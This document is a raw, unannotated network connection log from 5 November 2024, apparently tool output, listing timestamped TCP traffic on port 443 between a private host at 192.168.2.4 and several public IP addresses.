                                                                                                                                    Nov 5, 2024 09:03:13.246696949 CET49780443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.246696949 CET49780443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.246710062 CET4434978013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.246716976 CET4434978013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.345149994 CET4434977913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.345307112 CET4434977913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.345397949 CET49779443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.345397949 CET49779443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.345629930 CET49779443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.345638990 CET4434977913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.347951889 CET49784443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.347976923 CET4434978413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.348143101 CET49784443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.348243952 CET49784443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.348258972 CET4434978413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.365289927 CET4434978213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.365576982 CET4434978213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.365654945 CET49782443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.365654945 CET49782443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.365889072 CET49782443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.365901947 CET4434978213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.367639065 CET49785443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.367666006 CET4434978513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.367753983 CET49785443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.367913961 CET49785443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.367928982 CET4434978513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.372775078 CET4434978113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.373343945 CET4434978113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.373456955 CET49781443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.373456955 CET49781443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.373456955 CET49781443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.375242949 CET49786443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.375252962 CET4434978613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.375411987 CET49786443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.375411987 CET49786443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.375431061 CET4434978613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.391705990 CET4434978013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.391942024 CET4434978013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.392020941 CET49780443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.392020941 CET49780443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.392035007 CET49780443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.392040014 CET4434978013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.393925905 CET49787443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.393935919 CET4434978713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.394062042 CET49787443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.394113064 CET49787443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.394124985 CET4434978713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.590399981 CET4434978313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.591727972 CET49783443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.591727972 CET49783443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.591743946 CET4434978313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.591753006 CET4434978313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.683819056 CET49781443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.683829069 CET4434978113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.735820055 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:13.735835075 CET44349788188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.739906073 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:13.740247965 CET4434978313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.740335941 CET4434978313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.740365028 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:13.740377903 CET44349788188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.740406990 CET49783443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.740705013 CET49783443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.740710020 CET4434978313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.740737915 CET49783443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.740741968 CET4434978313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.746212959 CET49789443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.746241093 CET4434978913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.746339083 CET49789443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.751823902 CET49789443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.751838923 CET4434978913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.113270998 CET4434978513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.113734007 CET49785443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.113756895 CET4434978513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.114185095 CET49785443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.114191055 CET4434978513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.146485090 CET4434978413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.146821976 CET49784443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.146847963 CET4434978413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.147224903 CET49784443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.147231102 CET4434978413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.147543907 CET4434978613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.147954941 CET49786443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.147967100 CET4434978613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.148283005 CET49786443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.148287058 CET4434978613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.160381079 CET4434978713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.160712957 CET49787443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.160727024 CET4434978713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.161175966 CET49787443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.161180019 CET4434978713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.289293051 CET4434978613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.289633989 CET4434978613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.289675951 CET4434978413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.289690018 CET49786443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.289776087 CET49786443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.289779902 CET4434978413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.289786100 CET4434978613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.289794922 CET49786443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.289799929 CET4434978613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.289834976 CET49784443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.289907932 CET49784443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.289911032 CET4434978413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.289921045 CET49784443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.289923906 CET4434978413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.293607950 CET49790443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.293652058 CET4434979013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.293674946 CET49791443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.293698072 CET4434979113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.293714046 CET49790443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.293767929 CET49791443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.293838024 CET49790443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.293852091 CET4434979013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.294007063 CET49791443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.294022083 CET4434979113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.299535990 CET4434978713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.299583912 CET4434978713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.299707890 CET49787443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.299731970 CET49787443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.299746037 CET4434978713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.299753904 CET49787443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.299757957 CET4434978713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.301767111 CET49792443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.301779985 CET4434979213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.301851034 CET49792443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.301949978 CET49792443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.301966906 CET4434979213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.346575022 CET44349788188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.346801043 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.346812010 CET44349788188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.347829103 CET44349788188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.347893953 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.348222971 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.348234892 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.348284006 CET44349788188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.348329067 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.348336935 CET44349788188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.348356962 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.348385096 CET49788443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.348629951 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.348658085 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.348721981 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.348932981 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:14.348943949 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.403533936 CET4434978513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.403707027 CET4434978513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.403759956 CET49785443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.403799057 CET49785443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.403805017 CET4434978513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.403815985 CET49785443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.403819084 CET4434978513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.405848026 CET49794443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.405858994 CET4434979413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.405915976 CET49794443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.406054020 CET49794443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.406064034 CET4434979413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.511017084 CET4434978913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.511390924 CET49789443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.511404991 CET4434978913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.511915922 CET49789443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.511920929 CET4434978913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.652051926 CET4434978913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.652107954 CET4434978913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.652368069 CET49789443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.652501106 CET49789443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.652510881 CET4434978913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.652539015 CET49789443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.652543068 CET4434978913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.655852079 CET49795443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.655864000 CET4434979513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:14.655930042 CET49795443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.656110048 CET49795443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:14.656126022 CET4434979513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.115253925 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.115575075 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:15.115588903 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.116631985 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.116743088 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:15.117135048 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:15.117198944 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.117449045 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:15.117464066 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.169579029 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:15.253165007 CET4434979213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.253612041 CET4434979013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.253819942 CET4434979113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.253855944 CET49792443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.253880978 CET4434979213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.254188061 CET4434979413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.254216909 CET49790443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.254218102 CET49792443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.254223108 CET4434979213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.254239082 CET4434979013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.254512072 CET49794443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.254519939 CET4434979413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.254861116 CET49790443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.254863977 CET49794443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.254868031 CET4434979413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.254869938 CET4434979013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.255033016 CET49791443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.255053043 CET4434979113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.255434036 CET49791443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.255439043 CET4434979113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.391904116 CET4434979013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.391959906 CET4434979013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.392249107 CET49790443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.392249107 CET49790443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.392412901 CET49790443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.392427921 CET4434979013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.392452955 CET4434979213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.392559052 CET4434979213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.392697096 CET49792443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.392697096 CET49792443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.392743111 CET49792443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.392750978 CET4434979213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.392906904 CET4434979113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.393188000 CET4434979113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.393548965 CET49791443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.393616915 CET49791443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.393616915 CET49791443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.393626928 CET4434979113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.393634081 CET4434979113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.393867970 CET4434979413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.394139051 CET4434979413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.394246101 CET49794443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.395066023 CET49794443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.395066023 CET49794443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.395071030 CET4434979413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.395082951 CET4434979413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.395737886 CET49796443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.395765066 CET4434979613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.395908117 CET49796443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.396128893 CET49796443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.396142006 CET4434979613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.397322893 CET49798443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.397325993 CET49797443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.397335052 CET4434979813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.397341967 CET4434979713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.397556067 CET49799443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.397561073 CET4434979913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.397599936 CET49798443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.397603035 CET49797443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.397720098 CET49799443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.397720098 CET49797443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.397744894 CET4434979713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.397814989 CET49798443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.397814989 CET49799443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.397821903 CET4434979813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.397826910 CET4434979913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.424094915 CET4434979513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.424890041 CET49795443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.424890041 CET49795443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.424916983 CET4434979513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.424926043 CET4434979513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.563693047 CET4434979513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.563759089 CET4434979513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.563931942 CET49795443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.563931942 CET49795443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.564022064 CET49795443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.564033985 CET4434979513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.566268921 CET49800443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.566302061 CET4434980013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.566443920 CET49800443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.566545010 CET49800443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:15.566557884 CET4434980013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.765214920 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.765311956 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.766453028 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:15.766901016 CET49793443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:15.766926050 CET44349793188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.829580069 CET49801443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:03:15.829612017 CET44349801188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:15.829756975 CET49801443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:03:15.831828117 CET49801443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:03:15.831840038 CET44349801188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.015609980 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.015635967 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.015856028 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.016010046 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:03:16.016088009 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.016264915 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.016313076 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:03:16.016329050 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:03:16.016504049 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.016532898 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.016623974 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.026027918 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.026047945 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.026295900 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.026312113 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.141999960 CET4434979913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.157529116 CET4434979713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.167448997 CET4434979613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.167773962 CET4434979813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.184546947 CET49799443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.199543953 CET49797443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.215560913 CET49796443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.215560913 CET49798443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.360148907 CET4434980013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.413114071 CET49800443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.426110029 CET49804443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:03:16.426127911 CET44349804142.250.186.164192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.426202059 CET49804443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:03:16.426584005 CET49804443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:03:16.426598072 CET44349804142.250.186.164192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.443424940 CET44349801188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.446083069 CET49801443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:03:16.446096897 CET44349801188.114.97.3192.168.2.4
